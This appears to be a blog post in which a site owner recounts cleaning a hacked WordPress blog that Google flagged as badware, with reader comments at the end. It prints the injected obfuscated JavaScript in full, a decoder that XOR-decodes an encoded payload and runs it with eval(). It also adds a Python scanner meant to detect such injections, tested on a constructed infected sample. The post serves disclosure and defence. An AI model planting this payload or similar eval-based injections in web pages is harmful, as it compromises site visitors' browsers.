Those of you on Enlightened* computers may have noticed my website attempting to do some Moderately Bad Things to you as you browsed my blog and other material. I think I’m in the final stages of ripping out the crap that has infected this site while I was looking the other way. Some of you may find this stuff interesting.
This process started last week when I was in Kauai. I logged in from my new MacBook Pro to write a blog on my and Ruth’s trip. But when I typed in the URL, the following screen appeared in my browser:
I have to say that I had a brief moment of panic when I saw this. This message was as much of a surprise to me as it was a concern. And I had no idea what was going on. A few questions passed my mind:
- What happened to my site?
- When did this happen?
- What software was intercepting my attempts to access my site and refusing entry?
The fact that I was nervous about this breach while on vacation was unfortunate. But it's in my nature to want to correct problems like this, so I put my vacation on hold for a few hours to figure this out.
After a few minutes of poking around I was able to use Google's wonderful Webmaster Central to identify the source of the alarm. This site, offered as a free service by Google, had detected badware on my website and was warning Google users and stopping them from accessing the site. By Google "user" I mean anyone who has logged into Google and is using the Google toolbar (such as the one that is installed with Firefox by default).
It took me more reading to find out what they meant by badware. But helpful links to a non-profit web site quickly educated me on the subject. In short, badware is anything that does undesirable things to the computer running the web browser. In my case, this meant displaying banner ads, redirecting content to or from a third party, and downloading remote management software that would ostensibly allow a third party to read data off of your computer.
After more work I found a bunch of problems with a variety of pages on my site, but most were coming from my WordPress blog software. For instance, look at this nefarious JavaScript that had been inserted into the header and footer of every WordPress page on my site:
<script language=JavaScript>
// Decoder for the injected payload. Each character of the argument is mapped
// through the 75-entry table d (indexed by char code minus 48, i.e. '0'..'z'),
// the resulting 6-bit values are packed into bytes (four input characters per
// three bytes), each byte is XORed with 228, and the decoded text is handed to
// eval() in chunks of up to 1024 input characters.
function atibnb25(z) {
  var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,
      d=Array(63,59,50,30,25,47,38,15,36,17,0,0,0,0,0,0,23,41,52,27,18,31,22,9,37,45,35,57,10,61,39,24,51,20,1,6,49,13,32,53,7,28,4,0,0,0,0,3,0,21,33,60,19,14,54,0,55,48,8,5,34,16,40,42,62,58,2,12,26,44,46,11,29,56,43);
  for(s=Math.ceil(c/m);s>0;s--){
    h='';
    for(i=Math.min(c,m);i>0;i--,c--){
      x|=(d[z.charCodeAt(b++)-48])<<w;
      if(w){h+=String.fromCharCode(228^x&255);x>>=8;w-=2}
      else{w=6}
    }
    eval(h);
  }
}
atibnb25('dfnlgvy8LEG8kr48@6MiVvnlRechgvyb96OVLrA2dt4JmSjP_JxJrt4bGSjTLFOlR6IV@_UhZEAHX6ITsrG8QqM2w7xbgrOJmfylLoYJLLylw_K2C7cPAFj8souHwSAlg2YokrGJLC4bLrylG2YPe@xWFCUBU0cir3UBY7cP_CsTdfjVm2OfaPUBZPOVUejJm6IBadcHmfGlR6ITgfyHQlObxqIlwoOVSzUfwhnVFFOlRoMiU_');
</script>
I’m not entirely sure what this does, but I’m told that it redirects content to or from a third party without readers knowing it’s happening. But by cleaning out code like this, fixing modified .htaccess files, upgrading WordPress, disabling my wiki, and changing user IDs and passwords for all kinds of stuff, I think my site is clean.
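As an added example (not code from this blog or from WordPress), here is a small Python scanner a site owner could run over a WordPress install to flag the kind of injected inline script shown above: a script block that rebuilds a string with String.fromCharCode, passes it to eval(), and carries a long opaque payload literal. The regexes and the 120-character payload threshold are assumptions chosen for this illustration, and the sample footer files are constructed, not taken from the original site.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for the injection pattern shown above: an inline <script> that
# rebuilds a string with String.fromCharCode and hands it to eval(), carrying
# a long opaque payload literal. (Assumed thresholds; tune for your site.)
INLINE_SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
DECODE_THEN_EVAL = re.compile(r"String\.fromCharCode.*?\beval\(", re.S)
LONG_PAYLOAD = re.compile(r"['\"][A-Za-z0-9@_]{120,}['\"]")

def suspicious_scripts(text):
    """Return one reason string per inline <script> block that looks injected."""
    findings = []
    for m in INLINE_SCRIPT.finditer(text):
        body = m.group(1)
        reasons = []
        if DECODE_THEN_EVAL.search(body):
            reasons.append("decodes then eval()s a built string")
        if LONG_PAYLOAD.search(body):
            reasons.append("carries a long opaque payload literal")
        if reasons:
            findings.append("; ".join(reasons))
    return findings

def scan_tree(root, suffixes=(".php", ".html", ".js")):
    """Walk a WordPress install; map each flagged file to its findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = suspicious_scripts(path.read_text(errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed samples, not files taken from the original site.
CLEAN_FOOTER = ('<div id="footer"><script type="text/javascript">'
                'console.log("hi");</script></div>')
INFECTED_FOOTER = ('<div id="footer"></div><script language=JavaScript> '
                   'function q1(z){var h="",i;for(i=0;i<z.length;i++)'
                   '{h+=String.fromCharCode(z.charCodeAt(i)^7)}eval(h)} '
                   "q1('" + "dfnlgvy8LEG8kr48" * 10 + "') </script>")

def demo():
    """Write both samples into a throwaway tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp, "wp-content", "themes", "x")
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text(INFECTED_FOOTER)
        (Path(tmp) / "index.php").write_text(CLEAN_FOOTER)
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, why in demo().items():
        print(name, "->", why)
```

Run it from the web root with scan_tree(".") after a cleanup to confirm nothing with this signature survives; a hit is a reason to diff the file against a fresh WordPress or theme download, not proof by itself.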
Now I’m following the process of getting Google’s stamp-of-approval for my content. Since I’ve had some third-party support in verifying that some of my pages are clean, I’m reasonably confident I’ve corrected the problem. But until Google crawls my site again, you’ll see the following warning under the link if you search for my pages on Google:
The moral of this story is as follows:
- Despite being a big pain in my ass, Google is a much better company than most people realize. They are identifying, blocking, and helping correct dangerous garbage like this at no charge to you or me.
- Always run virus protection and spyware scanners on your system and keep them up-to-date.
- Know that just because a page looks clean doesn’t mean that it is clean.
- Run software other than vanilla Microsoft products unless you know what you’re doing with your Microsoft stuff.
More updates are certain to follow as I continue to work on this problem.
(*) Anything other than your vanilla Windows system. Changes in OS, web browser, virus or spyware detection were likely to result in feature additions that avoid this problem. But there’s no replacement for simply knowing what you’re doing.
Well, I have seen this script inside the PHP files while my blog was hacked and infected. This JavaScript is injected into the wp-login.php and admin-footer.php files by the hacker. For more details please read this article: http://www.itoneworldsystem.com/blog/2009/01/03/how-to-remove-malware-from-your-blog/
In this article, the step-by-step removal process is described.
Fantastic link. Thanks for sharing!